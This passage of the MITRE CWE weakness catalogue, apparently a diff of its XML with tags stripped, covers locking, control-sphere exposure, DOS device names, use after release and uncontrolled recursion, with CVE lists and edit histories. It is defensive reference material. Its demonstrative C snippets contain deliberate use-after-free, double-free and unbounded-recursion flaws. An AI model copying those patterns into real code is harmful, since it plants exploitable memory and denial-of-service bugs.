thread A sees that helper==null and enters the synchronized block and begins to execute: + + helper = new Helper(); + + If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values. + + + + + CVE-2021-1782 + Chain: improper locking (CWE-667) leads to race condition (CWE-362), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-1782 + + + CVE-2009-0935 + Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice + https://www.cve.org/CVERecord?id=CVE-2009-0935 + + + CVE-2010-4210 + function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory. + https://www.cve.org/CVERecord?id=CVE-2010-4210 + + + CVE-2008-4302 + Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash. + https://www.cve.org/CVERecord?id=CVE-2008-4302 + + + CVE-2009-1243 + OS kernel performs an unlock in some incorrect circumstances, leading to panic. + https://www.cve.org/CVERecord?id=CVE-2009-1243 + + + CVE-2009-2857 + OS deadlock + https://www.cve.org/CVERecord?id=CVE-2009-2857 + + + CVE-2009-1961 + OS deadlock involving 3 separate functions + https://www.cve.org/CVERecord?id=CVE-2009-1961 + + + CVE-2009-2699 + deadlock in library + https://www.cve.org/CVERecord?id=CVE-2009-2699 + + + CVE-2009-4272 + deadlock triggered by packets that force collisions in a routing table + https://www.cve.org/CVERecord?id=CVE-2009-4272 + + + CVE-2002-1850 + read/write deadlock between web server and script + https://www.cve.org/CVERecord?id=CVE-2002-1850 + + + CVE-2004-0174 + web server deadlock involving multiple listening connections + https://www.cve.org/CVERecord?id=CVE-2004-0174 + + + CVE-2009-1388 + multiple simultaneous calls to the same function trigger deadlock. + https://www.cve.org/CVERecord?id=CVE-2009-1388 + + + CVE-2006-5158 + chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833). + https://www.cve.org/CVERecord?id=CVE-2006-5158 + + + CVE-2006-4342 + deadlock when an operation is performed on a resource while it is being removed. + https://www.cve.org/CVERecord?id=CVE-2006-4342 + + + CVE-2006-2374 + Deadlock in device driver triggered by using file handle of a related device. + https://www.cve.org/CVERecord?id=CVE-2006-2374 + + + CVE-2006-2275 + Deadlock when large number of small messages cannot be processed quickly enough. + https://www.cve.org/CVERecord?id=CVE-2006-2275 + + + CVE-2005-3847 + OS kernel has deadlock triggered by a signal during a core dump. + https://www.cve.org/CVERecord?id=CVE-2005-3847 + + + CVE-2005-3106 + Race condition leads to deadlock. + https://www.cve.org/CVERecord?id=CVE-2005-3106 + + + CVE-2005-2456 + Chain: array index error (CWE-129) leads to deadlock (CWE-833) + https://www.cve.org/CVERecord?id=CVE-2005-2456 + + + CVE-2001-0682 + Program can not execute when attacker obtains a mutex. + https://www.cve.org/CVERecord?id=CVE-2001-0682 + + + CVE-2002-1914 + Program can not execute when attacker obtains a lock on a critical output file. + https://www.cve.org/CVERecord?id=CVE-2002-1914 + + + CVE-2002-1915 + Program can not execute when attacker obtains a lock on a critical output file. + https://www.cve.org/CVERecord?id=CVE-2002-1915 + + + CVE-2002-0051 + Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition. + https://www.cve.org/CVERecord?id=CVE-2002-0051 + + + CVE-2000-0338 + Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness. + https://www.cve.org/CVERecord?id=CVE-2000-0338 + + + CVE-2000-1198 + Chain: Lock files with predictable names. Resultant from randomness. + https://www.cve.org/CVERecord?id=CVE-2000-1198 + + + CVE-2002-1869 + Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close. + https://www.cve.org/CVERecord?id=CVE-2002-1869 + + + + + CON31-C + Do not destroy a mutex while it is locked + CWE More Abstract + + + POS48-C + Do not unlock or destroy another POSIX thread's mutex + CWE More Abstract + + + VNA00-J + Ensure visibility when accessing shared primitive variables + + + VNA02-J + Ensure that compound operations on shared variables are atomic + + + VNA05-J + Ensure atomicity when reading and writing 64-bit values + + + LCK06-J + Do not use an instance lock to protect shared static data + + + SFP19 + Missing Lock + + + ASCSM-CWE-667 + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships. + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-23 + updated Description, Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Insufficient Locking + + + + The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource. + + Resources such as files and directories may be inadvertently exposed through mechanisms such as insecure permissions, or when a program accidentally operates on the wrong object. For example, a program may intend that private files can only be provided to a specific user. This effectively defines a control sphere that is intended to prevent attackers from accessing these private files. If the file permissions are insecure, then parties other than the user will be able to access those files. + A separate control sphere might effectively require that the user can only access the private files, but not any other files on the system. If the program does not ensure that the user is only requesting private files, then the user might be able to access other files on the system. + In either case, the end result is that a resource has been exposed to the wrong party. + + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Confidentiality + Integrity + Other + Read Application Data + Modify Application Data + Other + + + + + + + Discouraged + CWE-668 is high-level and is often misused as a catch-all when lower-level CWE IDs might be applicable. It is sometimes used for low-information vulnerability reports [REF-1287]. It is a level-1 Class (i.e., a child of a Pillar). It is not useful for trend analysis. + Closely analyze the specific mistake that is allowing the resource to be exposed, and perform a CWE mapping for that mistake. + + + + + + + A "control sphere" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product's security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for "administrators" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be "users who are authenticated to the operating system on which the product is installed." Each sphere has different sets of actors and allowable behaviors. + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-22 + Critical + Clarified description to include permissions. + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly transfer a resource/behavior to another sphere, or improperly imports a resource/behavior from another sphere, in a manner that provides unintended control over that resource. + + + + + A "control sphere" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product's security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for "administrators" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be "users who are authenticated to the operating system on which the product is installed." Each sphere has different sets of actors and allowable behaviors. + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Operation + + + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + Unexpected State + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Background_Details, Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product constructs pathnames from user input, but it does not handle or incorrectly handles a pathname containing a Windows device name such as AUX or CON. This typically leads to denial of service or an information exposure when the application attempts to process the pathname as a regular file. + Not properly handling virtual filenames (e.g. AUX, CON, PRN, COM1, LPT1) can result in different types of vulnerabilities. In some cases an attacker can request a device via injection of a virtual filename in a URL, which may cause an error that leads to a denial of service or an error page that reveals sensitive information. A product that allows device names to bypass filtering runs the risk of an attacker injecting malicious code in a file with the name of a device. + + + + + + Resultant + + + + + + + + Historically, there was a bug in the Windows operating system that caused a blue screen of death. Even after that issue was fixed DOS device names continue to be a factor. + + + + Implementation + + + Operation + + + High + + + Availability + Confidentiality + Other + DoS: Crash, Exit, or Restart + Read Application Data + Other + + + + + Implementation + Be familiar with the device names in the operating system where your system is deployed. Check input for these device names. + + + + + CVE-2002-0106 + Server allows remote attackers to cause a denial of service via a series of requests to .JSP files that contain an MS-DOS device name. + https://www.cve.org/CVERecord?id=CVE-2002-0106 + + + CVE-2002-0200 + Server allows remote attackers to cause a denial of service via an HTTP request for an MS-DOS device name. + https://www.cve.org/CVERecord?id=CVE-2002-0200 + + + CVE-2002-1052 + Product allows remote attackers to use MS-DOS device names in HTTP requests to cause a denial of service or obtain the physical path of the server. + https://www.cve.org/CVERecord?id=CVE-2002-1052 + + + CVE-2001-0493 + Server allows remote attackers to cause a denial of service via a URL that contains an MS-DOS device name. + https://www.cve.org/CVERecord?id=CVE-2001-0493 + + + CVE-2001-0558 + Server allows a remote attacker to create a denial of service via a URL request which includes a MS-DOS device name. + https://www.cve.org/CVERecord?id=CVE-2001-0558 + + + CVE-2000-0168 + Microsoft Windows 9x operating systems allow an attacker to cause a denial of service via a pathname that includes file device names, aka the "DOS Device in Path Name" vulnerability. + https://www.cve.org/CVERecord?id=CVE-2000-0168 + + + CVE-2001-0492 + Server allows remote attackers to determine the physical path of the server via a URL containing MS-DOS device names. + https://www.cve.org/CVERecord?id=CVE-2001-0492 + + + CVE-2004-0552 + Product does not properly handle files whose names contain reserved MS-DOS device names, which can allow malicious code to bypass detection when it is installed, copied, or executed. + https://www.cve.org/CVERecord?id=CVE-2004-0552 + + + CVE-2005-2195 + Server allows remote attackers to cause a denial of service (application crash) via a URL with a filename containing a .cgi extension and an MS-DOS device name. + https://www.cve.org/CVERecord?id=CVE-2005-2195 + + + + File or Directory + + + + Windows MS-DOS device names + + + FIO32-C + Do not perform operations on devices that are only appropriate for files + CWE More Specific + + + FIO00-J + Do not operate on files in shared directories + + + SFP16 + Path Traversal + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-10-29 + updated Background_Details, Other_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Windows MS-DOS Device Names + Failure to Handle Windows Device Names + + + + The code contains a control flow path that does not reflect the algorithm that the path is intended to implement, leading to incorrect behavior any time this path is navigated. + This weakness captures cases in which a particular code segment is always incorrect with respect to the algorithm that it is implementing. For example, if a C programmer intends to include multiple statements in a single block but does not include the enclosing braces (CWE-483), then the logic is always incorrect. This issue is in contrast to most weaknesses in which the code usually behaves correctly, except when it is externally manipulated in malicious ways. + + + + + + Implementation + This issue typically appears in rarely-tested code, since the "always-incorrect" nature will be detected as a bug during normal usage. + + + + + Other + Other + Alter Execution Logic + + + + + CVE-2021-3011 + virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code + https://www.cve.org/CVERecord?id=CVE-2021-3011 + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This node could possibly be split into lower-level nodes. "Early Return" is for returning control to the caller too soon (e.g., CWE-584). "Excess Return" is when control is returned too far up the call stack (CWE-600, CWE-395). "Improper control limitation" occurs when the product maintains control at a lower level of execution, when control should be returned "further" up the call stack (CWE-455). "Incorrect syntax" covers code that's "just plain wrong" such as CWE-484 and CWE-483. + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Maintenance_Notes, Modes_of_Introduction, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses security features in a way that prevents the product's administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at a level of security that is desired by the administrator. + If the product's administrator does not have the ability to manage security-related decisions at all times, then protecting the product from outside threats - including the product's developer - can become impossible. For example, a hard-coded account name and password cannot be changed by the administrator, thus exposing that product to attacks that the administrator can not prevent. + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Implementation + + + + + Other + Varies by Context + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Community + 2008-04-11 + Draft 9 + 2008-04-11 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Name + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Design Principle Violation: Lack of Administrator Control over Security + + + + The product uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked. + + + + + + + + + + Implementation + + + Operation + + + + + Integrity + Confidentiality + Modify Application Data + Read Application Data + If a released resource is subsequently reused or reallocated, then an attempt to use the original resource might allow access to sensitive data that is associated with a different user or entity. + + + Other + Availability + Other + DoS: Crash, Exit, or Restart + When a resource is released it might not be in an expected state, later attempts to access the resource may lead to resultant errors that may lead to a crash. + + + + + The following code shows a simple example of a use after free error: + + char* ptr = (char*)malloc (SIZE);if (err) {abrt = 1;free(ptr);}...if (abrt) {logError("operation aborted before commit", ptr);} + + When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function. + + + The following code shows a simple example of a double free error: + + char* ptr = (char*)malloc (SIZE);...if (abrt) {free(ptr);}...free(ptr); + + Double free vulnerabilities have two common (and sometimes overlapping) causes: + + + + Error conditions and other exceptional circumstances + + + Confusion over which part of the program is responsible for freeing the memory + + + + Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once. + + + In the following C/C++ example the method processMessage is used to process a message received in the input array of char arrays. The input message array contains two char arrays: the first is the length of the message and the second is the body of the message. The length of the message is retrieved and used to allocate enough memory for a local char array, messageBody, to be created for the message body. The messageBody is processed in the method processMessageBody that will return an error if an error occurs while processing. If an error occurs then the return result variable is set to indicate an error and the messageBody char array memory is released using the method free and an error message is sent to the logError method. + + #define FAIL 0#define SUCCESS 1#define ERROR -1#define MAX_MESSAGE_SIZE 32 + int processMessage(char **message){ + int result = SUCCESS; + int length = getMessageLength(message[0]);char *messageBody; + if ((length > 0) && (length < MAX_MESSAGE_SIZE)) { + + messageBody = (char*)malloc(length*sizeof(char));messageBody = &message[1][0]; + int success = processMessageBody(messageBody); + if (success == ERROR) {result = ERROR;free(messageBody);} + }else {printf("Unable to process message; invalid message length");result = FAIL;} + if (result == ERROR) {logError("Error processing message", messageBody);} + return result; + } + + However, the call to the method logError includes the messageBody after the memory for messageBody has been released using the free method. This can cause unexpected results and may lead to system crashes. A variable should never be used after its memory resources have been released. + + ...messageBody = (char*)malloc(length*sizeof(char));messageBody = &message[1][0]; + int success = processMessageBody(messageBody); + if (success == ERROR) {result = ERROR;logError("Error processing message", messageBody);free(messageBody);}... + + + + + + CVE-2009-3547 + chain: race condition might allow resource to be released before operating on it, leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-3547 + + + + + SFP15 + Faulty Resource Use + + + FIO46-C + Do not access a closed file + CWE More Abstract + + + MEM30-C + Do not access freed memory + CWE More Abstract + + + ASCSM-CWE-672 + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, Description, Name, Relationships + + + CWE Content Team + MITRE + 2010-09-27 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Use of a Resource after Expiration or Release + + + + The product does not prevent the definition of control spheres from external actors. + Typically, a product defines its control sphere within the code itself, or through configuration by the product's administrator. In some cases, an external party can change the definition of the control sphere. This is typically a resultant weakness. + + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Other + Other + + + + + Consider a blog publishing tool, which might have three explicit control spheres: the creation of articles, only accessible to a "publisher;" commenting on articles, only accessible to a "commenter" who is a registered user; and reading articles, only accessible to an anonymous reader. Suppose that the application is deployed on a web server that is shared with untrusted parties. If a local user can modify the data files that define who a publisher is, then this user has modified the control sphere. In this case, the issue would be resultant from another weakness such as insufficient permissions. + + + In Untrusted Search Path (CWE-426), a user might be able to define the PATH environment variable to cause the product to search in the wrong directory for a library to load. The product's intended sphere of control would include "resources that are only modifiable by the person who installed the product." The PATH effectively changes the definition of this sphere so that it overlaps the attacker's sphere of control. + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + A "control sphere" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product's security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for "administrators" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be "users who are authenticated to the operating system on which the product is installed." Each sphere has different sets of actors and allowable behaviors. + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Theoretical_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Relevant_Properties + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack. + + + + + + + + + Stack Exhaustion + + + + + Implementation + The uncontrolled recursion is often due to an improper or missing conditional + + + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + Resources including CPU, memory, and stack memory could be rapidly consumed or exhausted, eventually leading to an exit or crash. + + + Confidentiality + Read Application Data + In some cases, an application's interpreter might kill a process or thread that appears to be consuming too much resources, such as with PHP's memory_limit setting. When the interpreter kills the process/thread, it might report an error containing detailed information such as the application's installation path. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Ensure an end condition will be reached under all logic conditions. The end condition may include testing against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action. + Moderate + + + Implementation + Increase the stack size. + Limited + Increasing the stack size might only be a temporary measure, since the stack typically is still not very large, and it might remain easy for attackers to cause an out-of-stack fault. + + + + + In this example a mistake exists in the code where the exit condition contained in flg is never called. This results in the function calling itself over and over again until the stack is exhausted. + + + void do_something_recursive (int flg) + { + + ... // Do some real work here, but the value of flg is unmodified + if (flg) { do_something_recursive (flg); } // flg is never modified so it is always TRUE - this call will continue until the stack explodes + + } + int flag = 1; // Set to TRUE + do_something_recursive (flag); + + Note that the only difference between the Good and Bad examples is that the recursion flag will change value and cause the recursive call to return. + + void do_something_recursive (int flg) + { + + ... // Do some real work here + // Modify value of flg on done condition + if (flg) { do_something_recursive (flg); } // returns when flg changes to 0 + + } + int flag = 1; // Set to TRUE + do_something_recursive (flag); + + + + + + CVE-2007-1285 + Deeply nested arrays trigger stack exhaustion. + https://www.cve.org/CVERecord?id=CVE-2007-1285 + + + CVE-2007-3409 + Self-referencing pointers create infinite loop and resultant stack exhaustion. + https://www.cve.org/CVERecord?id=CVE-2007-3409 + + + CVE-2016-10707 + Javascript application accidentally changes input in a way that prevents a recursive call from detecting an exit condition. + https://www.cve.org/CVERecord?id=CVE-2016-10707 + + + CVE-2016-3627 + An attempt to recover a corrupted XML file infinite recursion protection counter was not always incremented missing the exit condition. + https://www.cve.org/CVERecord?id=CVE-2016-3627 + + + CVE-2019-15118 + USB-audio driver's descriptor code parsing allows unlimited recursion leading to stack exhaustion. + https://www.cve.org/CVERecord?id=CVE-2019-15118 + + + + CPU + + + + A9 + Denial of Service + CWE More Specific + + + SFP13 + Unrestricted Consumption + + + 